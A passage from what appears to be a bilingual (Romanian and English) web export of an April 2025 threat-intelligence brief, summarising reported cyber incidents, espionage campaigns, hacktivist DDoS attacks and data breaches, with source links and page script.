aprilie, Check Point a raportat exploatarea activ&#259; a CVE-2025-24054, o vulnerabilitate de divulgare hash NTLM declan&#537;at&#259; de fi&#537;iere r&#259;u inten&#539;ionate .library-ms. &Icirc;n ciuda patch-ului Microsoft din 11 martie, atacatorii au &icirc;nceput s&#259; foloseasc&#259; defectul p&acirc;n&#259; pe 19 martie, &#539;int&acirc;nd entit&#259;&#539;i din Polonia &#537;i Rom&acirc;nia prin campanii de malspam. 
Exploatarea necesit&#259; o interac&#539;iune minim&#259; a utilizatorului, cum ar fi clic dreapta sau navigare la un folder &#537;i seam&#259;n&#259; cu vulnerabilitatea anterioar&#259; CVE-2024-43451.<a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/research.checkpoint.com\/2025\/cve-2025-24054-ntlm-exploit-in-the-wild\/\">link<\/a> <\/p><h3 id=\"disruption-and-destruction\">Perturbare &#537;i distrugere<\/h3><p><strong>Un atac cibernetic perturb&#259; furnizorul spaniol de ap&#259; Aig&uuml;es de Matar&oacute;<\/strong><br>Pe 23 aprilie, un atac cibernetic a lovit furnizorul spaniol de ap&#259; Aig&uuml;es de Matar&oacute;, afect&acirc;nd sistemele corporative &#537;i site-ul s&#259;u web, dar l&#259;s&acirc;nd intacte controalele de aprovizionare cu ap&#259; &#537;i de calitate. Aig&uuml;es de Matar&oacute; a declarat c&#259; atacul ar putea deranja abona&#539;ii s&#259;i care au devenit &icirc;n imposibilitatea de a accesa serviciile corporative &#537;i ar putea &icirc;nt&acirc;mpina &icirc;nt&acirc;rzieri pentru facturare &#537;i alte proceduri administrative. Natura atacului r&#259;m&acirc;ne neconfirmat&#259;.<a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/therecord.media\/cyberattack-water-supplier-barcelona-spain\">link<\/a> <\/p><h3 id=\"information-operations\">Opera&#539;iuni de informare<\/h3><p><strong>Contul de socializare a premierului ceh Petr Fiala compromis<\/strong><br>Pe 8 aprilie, hackerii au &icirc;nc&#259;lcat contul X al premierului ceh Petr Fiala (fostul Twitter), post&acirc;nd mesaje false, inclusiv despre un atac rusesc asupra solda&#539;ilor cehi. 
Activitatea r&#259;u inten&#539;ionat&#259; a urm&#259;rit s&#259; induc&#259; &icirc;n eroare adep&#539;ii &#537;i s&#259; prejudicieze reputa&#539;ia premierului.<code>rusia<\/code> <code>social media<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.reuters.com\/world\/europe\/czech-pm-fialas-x-account-attacked-with-fake-posts-2025-04-08\/\">link<\/a> <\/p><p><strong>Securitatea de stat a Lituaniei avertizeaz&#259; cu privire la activitatea hibrid&#259; rus&#259; &#537;i belarus&#259; fa&#539;&#259; de diaspora belarus&#259;<\/strong><br>Pe 23 aprilie, Departamentul de Securitate de Stat al Lituaniei a raportat public despre atacurile hibride planificate de serviciile de informa&#539;ii ruse &#537;i bieloruse &icirc;mpotriva diasporei belaruse care tr&#259;iesc &icirc;n Lituania. Atacurile au implicat componente ale opera&#539;iunii de informare, cum ar fi videoclipuri filmate de grupuri litviniste &#537;i &icirc;ndreptate &icirc;mpotriva Lituaniei, care au fost r&#259;sp&acirc;ndite pe re&#539;elele de socializare. Scopul atacurilor ar fi incitarea tensiunilor etnice &#537;i cre&#537;terea sentimentului de nesiguran&#539;&#259; &icirc;n Lituania.<code>rusia<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.vsd.lt\/en\/2025\/04\/23\/priesiskos-zvalgybos-tarnybos-bando-organizuoti-smurtinius-ispuolius-pries-lietuvoje-gyvenancius-baltarusius\/\">link<\/a> <\/p><h3 id=\"data-exposure-and-leaks\">Expunerea datelor &#537;i scurgerile<\/h3><p><strong>Scurgere major&#259; de date &icirc;n curs de anchet&#259; la ministerele olandeze<\/strong><br>Pe 10 aprilie, a ie&#537;it la iveal&#259; o scurgere semnificativ&#259; de date care afecteaz&#259; mai multe ministere olandeze, inclusiv Afaceri Economice &#537;i Clim&#259; &#537;i Cre&#537;tere Verde. Autorit&#259;&#539;ile olandeze nu au confirmat dac&#259; au fost accesate sau furate date cu caracter personal. 
The Ministry of the Interior is leading the investigation, and the Dutch Data Protection Authority has been notified, although the full scope and impact remain unclear.<code>public administration<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/nltimes.nl\/2025\/04\/10\/major-data-leak-discovered-multiple-dutch-ministries-impact-currently-unclear\">link<\/a> <\/p><p><strong>Samsung Germany data breach exposes 270,000 customer support records<\/strong><br>On April 14, German media revealed that on March 30, data from Samsung Germany was compromised in a data breach at its logistics provider, Spectos, exposing a support database containing customer data. The breach led to the theft of 270,000 customer support records, now listed on Have I Been Pwned, including emails, names, purchases and tracking numbers, which could be misused for phishing, although access to the core systems was blocked and the direct risks of identity theft remain low.<code>technology<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.heise.de\/en\/news\/Have-I-Been-Pwned-270-000-data-records-stolen-from-Samsung-integrated-10350941.html\">link<\/a> <\/p><p><strong>Europcar GitLab breach exposes data of up to 200,000 customers<\/strong><br>In March 2025, a hacker gained access to the private GitLab repositories of Europcar Mobility Group, stealing 37 GB of data, including source code, SQL backups and configuration files. 
The breach may affect up to 200,000 customers, with names and email addresses exposed from the Europcar brands Goldcar and Ubeeqo. Europcar confirmed the GitLab breach, notified the authorities and is contacting affected users. No passwords or payment information were compromised.<code>transport<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/europcar-gitlab-breach-exposes-data-of-up-to-200-000-customers\/\">link<\/a> <\/p><h3 id=\"hacktivism\">Hacktivism<\/h3><p><strong>Suspected Russia-linked hacktivists target Finnish election-related organisations<\/strong><br>On April 8, according to the Finnish newspaper Yle, the suspected Russia-linked hacktivists NoName057(16) claimed responsibility for several DDoS attacks that targeted almost all Finnish parliamentary parties, as well as several organisations and websites of individuals. Election-related websites were among the targets. The group claims the attacks are a response to President Stubb's ceasefire proposal for Ukraine.<code>russia<\/code> <code>elections<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/yle.fi\/a\/74-20154753\">link<\/a> <\/p><p><strong>Pro-Russian hacktivists target Dutch public organisations in DDoS attacks<\/strong><br>On April 30, the pro-Russian threat actor NoName057(16) disrupted Dutch public and private services with ongoing DDoS attacks, targeting websites in several provinces and municipalities. The group claimed the attacks were punishment for the military aid given to Ukraine. Despite the service disruptions, Dutch officials confirmed that no internal systems were compromised. 
The cybercriminal actor continues its campaign through the DDoSia platform.<code>russia<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.ncsc.nl\/actueel\/nieuws\/2025\/04\/30\/lopende-ddos-aanvallen-op-nederlandse-organisaties\">link<\/a><\/p><p><strong>Hacktivist coalition Holy League targets the British military with DDoS attacks<\/strong><br>On April 7, several media outlets reported on Holy League, a coalition of approximately 90 pro-Russian and pro-Palestinian hacktivist groups, which launches weekly DDoS attacks on the British military and infrastructure agencies. Their mission is to wage cyberwarfare against the allies of Ukraine and Israel.<code>defence<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/insight.scmagazineuk.com\/holy-league-claims-attack-on-ukraine-allies\">link<\/a> <\/p><h2 id=\"world\">World<\/h2><h3 id=\"cyber-policy-and-law-enforcement-2\">Cyber policy and law enforcement<\/h3><p><strong>FBI seeks public help to identify the Salt Typhoon hackers behind telecom breaches<\/strong><br>On April 24, the FBI requested public assistance and announced a reward of up to USD 10 million for information identifying the Salt Typhoon hackers, a Chinese cyberespionage group responsible for breaches of US and global telecommunications networks. 
These hackers gained access to sensitive data, including the private communications of US officials, and are still targeting telecommunications providers worldwide, with investigations ongoing and potential sanctions on related Chinese firms.<code>China<\/code> <code>united states<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.ic3.gov\/PSA\/2025\/PSA250424-2\">link<\/a> <\/p><p><strong>US implements national security program to protect Americans' sensitive data from foreign adversaries<\/strong><br>On April 11, the US Department of Justice began implementing a national security program under Executive Order 14117 to prevent foreign adversaries such as China, Russia and Iran from accessing Americans' sensitive personal and government-related data. The initiative aims to counter threats such as espionage and AI-enabled surveillance by restricting data transactions and enforcing new compliance measures.<code>artificial intelligence<\/code> <code>united states<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.justice.gov\/opa\/pr\/justice-department-implements-critical-national-security-program-protect-americans-sensitive\">link<\/a> <\/p><p><strong>Trump fires NSA director on the advice of Laura Loomer, according to the Washington Post<\/strong><br>On April 2, General Timothy Haugh was dismissed as director of the US National Security Agency (NSA), reportedly following the advice of far-right activist Laura Loomer, according to The Washington Post. 
Loomer urged President Trump to remove officials she considered insufficiently loyal. The decision drew criticism from top Democrats, who expressed concern about the national security implications.<code>united states<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/apnews.com\/article\/trump-national-security-agency-tim-haugh-ec08b455e2c1112f5c6bb1881fad73e2\">link<\/a> <\/p><p><strong>China tacitly acknowledges cyber activity targeting US infrastructure<\/strong><br>On April 10, the Wall Street Journal reported that during a confidential meeting in Geneva in December 2024, Chinese officials indirectly signalled that Beijing had backed cyber intrusions against US critical infrastructure. The activity, linked to Volt Typhoon, was framed as a response to US support for Taiwan. US officials interpreted the remarks as a strategic warning amid escalating tensions.<code>China<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.wsj.com\/politics\/national-security\/in-secret-meeting-china-acknowledged-role-in-u-s-infrastructure-hacks-c5ab37cb\">link<\/a> <\/p><p><strong>China restricts exports of rare earth minerals<\/strong><br>On April 13, the New York Times reported that China had imposed new export restrictions on rare earth minerals and magnets, requiring special licences. These materials are crucial for semiconductor production. 
In addition, China's Ministry of Commerce, together with the General Administration of Customs, reportedly banned Chinese firms from engaging with several US companies, in particular military contractors.<code>China<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.nytimes.com\/2025\/04\/13\/business\/china-rare-earths-exports.html\">link<\/a> <\/p><h3 id=\"cyberespionage-and-prepositioning-2\">Cyberespionage and prepositioning<\/h3><p><strong>Suspected Chinese threat actor UNC5221 actively exploiting critical Ivanti Connect Secure vulnerability<\/strong><br>On April 3, Ivanti disclosed CVE-2025-22457, a critical buffer overflow vulnerability in Ivanti Connect Secure VPN appliances allowing remote code execution. Mandiant and Ivanti reported active exploitation since mid-March by UNC5221, a suspected China-nexus espionage group, deploying custom malware. A patch was released on February 11, 2025; users are urged to upgrade immediately.<code>China<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/cloud.google.com\/blog\/topics\/threat-intelligence\/china-nexus-exploiting-critical-ivanti-vulnerability?hl=en\">link<\/a> <\/p><p><strong>Chinese APT IronHusky targets the Russian government with updated MysterySnail malware<\/strong><br>On April 17, Kaspersky reported that the Chinese-speaking IronHusky hackers are targeting Russian and Mongolian government organisations using the updated MysterySnail RAT malware. 
The updated implant, observed in recent attacks, is deployed via malicious MMC scripts disguised as Word documents, which download second-stage payloads and establish persistence on compromised systems.<code>China<\/code> <code>russia<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/securelist.com\/mysterysnail-new-version\/116226\/\">link<\/a> <\/p><p><strong>China accuses US intelligence of targeting Chinese cryptographic firm<\/strong><br>On April 28, China's national CSIRT (CNCERT) reported on a 2024 cyberespionage operation in which a US intelligence agency targeted a leading Chinese provider of commercial cryptographic products, stealing customer data and code project files. CNCERT stated that the US-linked threat actor operated mainly during US working hours and used high-level cyberespionage tactics. This publication was likely intended as a response to recent public reports on China's Volt Typhoon campaign.<code>China<\/code> <code>united states<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/mp.weixin.qq.com\/s\/kzdSrLdejED3MxSKtszUnA?\">link<\/a><\/p><p><strong>Trojanised Alpine Quest app used to spy on Russian military operations<\/strong><br>On April 21, researchers at the Russian mobile antivirus company Doctor Web discovered a new Android spyware campaign hiding in trojanised versions of the Alpine Quest mapping app, often used by Russian soldiers for war zone planning. 
The malicious app, promoted as a cracked Pro version, steals sensitive data such as geolocation, contacts and files, demonstrating how mobile surveillance is now deployed by both sides of the conflict for military intelligence.<code>defence<\/code> <code>russia<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/news.drweb.com\/show\/?i=15006&amp;lng=en&amp;c=5\">link<\/a> <\/p><p><strong>Threat actor Sapphire Werewolf likely targets Russian energy companies with an updated Amethyst stealer<\/strong><br>On April 9, BI.ZONE Threat Intelligence reported on the threat actor Sapphire Werewolf and its improved Amethyst stealer targeting energy companies, distributed via phishing emails disguised as Russian-language human resources memos. The updated malware includes advanced virtual environment checks and uses Triple DES encryption for string protection. It collects credentials from browsers and applications, sending system data to specific addresses. 
The malware also executes a decoy PDF and checks for virtual machine indicators.<code>energy<\/code> <code>russia<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/bi-zone.medium.com\/sapphire-werewolf-refines-amethyst-stealer-to-attack-energy-companies-f55931a5c4d4\">link<\/a> <\/p><p><strong>Lazarus targets South Korean organisations in Operation SyncHole<\/strong><br>On April 24, Kaspersky reported that between November 2024 and February 2025, the North Korean Lazarus group launched a campaign called Operation SyncHole, targeting at least six organisations in South Korea. These organisations span industries such as software, IT, finance, semiconductor manufacturing and telecommunications. The operation exploited vulnerabilities in South Korean software to carry out watering hole attacks and install various forms of malware.<code>finance<\/code> <code>north korea<\/code> <code>technology<\/code> <code>telecommunications<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/securelist.com\/operation-synchole-watering-hole-attacks-by-lazarus\/116326\/\">link<\/a> <\/p><p><strong>Kimsuky APT group exploits RDP and MS Office flaws in global cyberespionage campaign<\/strong><br>On April 14, researchers at the AhnLab Security Intelligence Center (ASEC) revealed that the North Korea-linked Kimsuky group is actively exploiting RDP and Microsoft Office vulnerabilities, notably BlueKeep (CVE-2019-0708) and CVE-2017-11882, in a global cyberespionage campaign known as Lavorul cibernetic. 
The attackers deploy custom malware such as MySpy, RDPWrap and keyloggers to maintain persistent access and exfiltrate sensitive data from targeted sectors in South Korea, the US, China, Japan and many others.<code>north korea<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/asec.ahnlab.com\/en\/87554\/\">link<\/a> <\/p><p><strong>APT36 exploits Pahalgam attack theme to target Indian government with Crimson RAT<\/strong><br>On April 30, cybersecurity firm Seqrite reported that Pakistan-linked APT36 used decoy documents themed around the Pahalgam attacks to target Indian government entities. The campaign used Crimson RAT malware delivered via malicious Excel files with embedded macros. These files extracted and executed the malware while displaying legitimate-looking documents. The operation shared infrastructure with SideCopy, indicating coordination between the groups.<code>India<\/code> <code>Pakistan<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.seqrite.com\/blog\/advisory-pahalgam-attack-themed-decoys-used-by-apt36-to-target-the-indian-government\/\">link<\/a><\/p><p><strong>Apple patches two exploited zero-days in targeted iPhone attacks<\/strong><br>On April 16, Apple released emergency updates to fix two zero-days, CVE-2025-31200 in CoreAudio and CVE-2025-31201 in RPAC, used in targeted iPhone attacks. The flaws affected multiple Apple platforms and allowed remote code execution and PAC bypass. Apple's and Google's threat teams discovered the issues. 
Users are urged to update their devices, even though the attacks are highly targeted.<a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/support.apple.com\/en-us\/122282\">link<\/a> <\/p><p><strong>ClickFix: state-sponsored actors exploit new phishing technique in key sectors<\/strong><br>On April 17, Proofpoint reported that state-sponsored actors, including TA571, TA578, UAC-0050 and Storm-1865, have increasingly adopted the &ldquo;ClickFix&rdquo; phishing technique. This method tricks users into executing malicious PowerShell commands via fake error messages or CAPTCHA prompts, leading to malware infections such as DanaBot, Lumma Stealer and AsyncRAT. Targets include sectors such as transport, logistics and hospitality, with campaigns impersonating services such as Booking.com and Microsoft SharePoint.<a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.proofpoint.com\/us\/blog\/threat-insight\/around-world-90-days-state-sponsored-actors-try-clickfix\">link<\/a> <\/p><p><strong>Brazil allegedly conducted cyberespionage against Paraguay amid energy trade negotiations<\/strong><br>On March 31, UOL, a Brazilian media outlet, claimed that the Brazilian Intelligence Agency (ABIN) conducted a cyberespionage campaign in 2024 against the Paraguayan government to obtain sensitive information on energy trade negotiations. 
The negotiations specifically concerned tariffs at the Itaipu hydroelectric plant.<a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.yahoo.com\/news\/brazils-government-admits-spying-paraguay-233533589.html\">link<\/a> <\/p><h3 id=\"cybercrime-2\">Cybercrime<\/h3><p><strong>Tycoon2FA phishing kit adopts new evasion techniques<\/strong><br>On April 10, Trustwave reported that the Tycoon2FA phishing kit has incorporated new evasion tactics, including JavaScript obfuscated with invisible Unicode characters, custom HTML5 CAPTCHA challenges and anti-debugging scripts. These improvements aim to bypass security measures and hinder analysis. The kit continues to target Microsoft 365 users, underscoring the need for robust detection strategies against evolving phishing threats.<a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.trustwave.com\/en-us\/resources\/blogs\/spiderlabs-blog\/tycoon2fa-new-evasion-technique-for-2025\/\">link<\/a> <\/p><p><strong>Phishing campaign impersonates Cloudflare services and uses Telegram to filter victim IPs<\/strong><br>On April 1, researchers at hunt.io reported that they had tracked a phishing campaign that used fake Cloudflare prompts to trick users into clicking a malicious redirect link. 
Further analysis showed that the threat actors used a Russian-language Telegram channel and used Telegram more generally to filter victim IPs.<a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/hunt.io\/blog\/russian-actor-cloudflare-phishing-telegram-c2\">link<\/a> <\/p><p><strong>Lazarus ClickFake Interview campaign targets cryptocurrency platforms<\/strong><br>On March 31, Sekoia reported that the North Korea-linked threat actor Lazarus has continued to target the cryptocurrency sector through fake job interviews, most recently via the so-called ClickFake interviews. ClickFake Interview uses fake job interview websites to deploy a Go backdoor in Windows and macOS environments, using the ClickFix tactic.<code>north korea<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/blog.sekoia.io\/clickfake-interview-campaign-by-lazarus\/\">link<\/a> <\/p><p><strong>Cookie-Bite PoC shows how malicious Chrome extensions can bypass MFA and hijack cloud sessions<\/strong><br>On April 22, Varonis Threat Labs researchers disclosed the Cookie-Bite attack, a proof of concept that uses a hidden Chrome extension to steal Azure Entra ID session cookies and bypass MFA protections. 
The malicious extension monitors Microsoft login events, exfiltrates session tokens and allows attackers to inject them for full access to services such as Microsoft 365 and Teams, highlighting the severe risks posed by malicious browser extensions in cloud-based identity environments.<code>technology<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.varonis.com\/blog\/cookie-bite\">link<\/a> <\/p><p><strong>Google OAuth and DKIM flaws enable nearly undetectable phishing attacks<\/strong><br>On April 15, hackers exploited a flaw in Google's DKIM system to send phishing emails that passed authentication checks and appeared to come from no-reply@google.com, leading victims to a fake Google support portal hosted on sites.google.com. By abusing OAuth notifications and DKIM's limited validation scope, the attackers created highly convincing credential-theft messages, an approach that also targets PayPal users through similar infrastructure abuse.<code>technology<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/threadreaderapp.com\/thread\/1912439023982834120.html\">link<\/a> <\/p><h3 id=\"data-exposure-and-leaks-2\">Data exposure and leaks<\/h3><p><strong>SK Telecom confirms malware breach exposing sensitive USIM data<\/strong><br>On April 22, South Korea's largest mobile operator, SK Telecom, announced that malware had infiltrated its systems, exposing sensitive USIM data such as IMSI, MSISDN and authentication keys in a cyberattack discovered on April 19. 
subscribers.<code>telecommunications<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/news.sktelecom.com\/211423\">link<\/a> <\/p><h3 id=\"information-operations-2\">Information operations<\/h3><p><strong>China uses AI in information operations targeting Taiwan<\/strong><br>On April 9, The Japan Times published an article on China conducting information operations on social networks, namely Facebook and TikTok, to create internal unrest in Taiwan. In fact, Taiwan's National Security Bureau published a report on China's use of AI to advance these objectives, both in generating and in disseminating messages. Their goal is to create division within the population.<code>artificial intelligence<\/code> <code>China<\/code> <code>Japan<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.japantimes.co.jp\/news\/2025\/04\/08\/asia-pacific\/politics\/taiwan-china-ai-disinformation\/\">link<\/a> <\/p><h3 id=\"disruption-and-destruction-2\">Disruption and destruction<\/h3><p><strong>China accuses US of cyberattacks during the Asian Winter Games<\/strong><br>On April 15, Chinese authorities accused the US NSA of launching cyberattacks during the 2025 Asian Winter Games in Harbin. The attacks allegedly targeted infrastructure in Heilongjiang province and attempted to access athletes' personal data. Three NSA agents were named and US universities were implicated. 
China claims the activity was intended to disrupt critical systems and steal sensitive information.<code>China<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/news.cgtn.com\/news\/2025-04-15\/China-names-U-S-secret-agents-involved-in-Harbin-2025-cyberattacks-1CAgLi2gwKY\/p.html\">link<\/a> <\/p><div class=\"footnotes\"><hr><ol><li id=\"fn-1\"><p>Conclusions or attributions made in this document reflect only what publicly available sources report. They do not reflect our position.&nbsp;<a href=\"#fnref-1\" class=\"footnoteBackLink\" title=\"Jump back to footnote 1 in the text.\">&#8617;<\/a><\/p><\/li><\/ol><\/div><\/div>\n        <\/div>\n\n        <script>\n        function switchLanguage(lang) {\n            \/\/ Hide both versions\n            document.getElementById(\"content-ro\").style.display = \"none\";\n            document.getElementById(\"content-en\").style.display = \"none\";\n\n            \/\/ Reset the button styles\n            document.querySelectorAll(\".lang-btn\").forEach(function(btn) {\n                btn.style.background = \"#e5e7eb\";\n                btn.style.color = \"#374151\";\n                btn.classList.remove(\"lang-btn-active\");\n            });\n\n            \/\/ Show the selected version\n            if (lang === \"ro\") {\n                document.getElementById(\"content-ro\").style.display = \"block\";\n                document.getElementById(\"btn-lang-ro\").style.background = \"#3b82f6\";\n                document.getElementById(\"btn-lang-ro\").style.color = \"white\";\n                document.getElementById(\"btn-lang-ro\").classList.add(\"lang-btn-active\");\n            } else {\n                document.getElementById(\"content-en\").style.display = \"block\";\n                document.getElementById(\"btn-lang-en\").style.background = \"#3b82f6\";\n                
document.getElementById(\"btn-lang-en\").style.color = \"white\";\n                document.getElementById(\"btn-lang-en\").classList.add(\"lang-btn-active\");\n            }\n\n            \/\/ Salveaz\u0103 preferin\u021ba \u00een localStorage\n            localStorage.setItem(\"gpss_preferred_language\", lang);\n        }\n\n        \/\/ Restaureaz\u0103 preferin\u021ba utilizatorului la \u00eenc\u0103rcare\n        document.addEventListener(\"DOMContentLoaded\", function() {\n            var preferredLang = localStorage.getItem(\"gpss_preferred_language\") || \"ro\";\n            switchLanguage(preferredLang);\n        });\n\n        \/\/ Hover effects pentru butoane\n        document.querySelectorAll(\".lang-btn\").forEach(function(btn) {\n            btn.addEventListener(\"mouseenter\", function() {\n                if (!this.classList.contains(\"lang-btn-active\")) {\n                    this.style.background = \"#bfdbfe\";\n                    this.style.color = \"#1e40af\";\n                }\n            });\n            btn.addEventListener(\"mouseleave\", function() {\n                if (!this.classList.contains(\"lang-btn-active\")) {\n                    this.style.background = \"#e5e7eb\";\n                    this.style.color = \"#374151\";\n                }\n            });\n        });\n        <\/script>\n\n        <style>\n        .lang-btn:hover {\n            transform: translateY(-2px);\n            box-shadow: 0 4px 12px rgba(59, 130, 246, 0.3);\n        }\n        .lang-btn-active {\n            box-shadow: 0 4px 12px rgba(59, 130, 246, 0.4);\n        }\n        <\/style>","protected":false},"excerpt":{"rendered":"<p>\ud83c\udf0d Limb\u0103 \/ Language: \ud83c\uddec\ud83c\udde7 English (Original) \ud83c\uddf7\ud83c\uddf4 Rom\u00e2n\u0103 Traducere automat\u0103 \/ Automatic translation Cyber Brief (April 2025)May 2, 2025 &#8211; Version: 1TLP:CLEARExecutive summaryWe analysed 311 open source reports for this Cyber Brief1.Policy, 
cooperation, and law enforcement. The FBI sought help to identify Chinese hackers breaching telecoms. The US launched a program to shield sensitive [&hellip;]<\/p>\n","protected":false},"featured_media":0,"template":"","meta":{"footnotes":""},"ti_category":[198],"ti_source":[172],"ti_severity":[187],"class_list":["post-992324","threat_intelligence","type-threat_intelligence","status-publish","hentry","ti_category-threat-actor","ti_source-cert-eu","ti_severity-critical"],"_links":{"self":[{"href":"https:\/\/delve.ro\/ro\/wp-json\/wp\/v2\/threat-intelligence\/992324","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/delve.ro\/ro\/wp-json\/wp\/v2\/threat-intelligence"}],"about":[{"href":"https:\/\/delve.ro\/ro\/wp-json\/wp\/v2\/types\/threat_intelligence"}],"version-history":[{"count":0,"href":"https:\/\/delve.ro\/ro\/wp-json\/wp\/v2\/threat-intelligence\/992324\/revisions"}],"wp:attachment":[{"href":"https:\/\/delve.ro\/ro\/wp-json\/wp\/v2\/media?parent=992324"}],"wp:term":[{"taxonomy":"ti_category","embeddable":true,"href":"https:\/\/delve.ro\/ro\/wp-json\/wp\/v2\/ti_category?post=992324"},{"taxonomy":"ti_source","embeddable":true,"href":"https:\/\/delve.ro\/ro\/wp-json\/wp\/v2\/ti_source?post=992324"},{"taxonomy":"ti_severity","embeddable":true,"href":"https:\/\/delve.ro\/ro\/wp-json\/wp\/v2\/ti_severity?post=992324"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}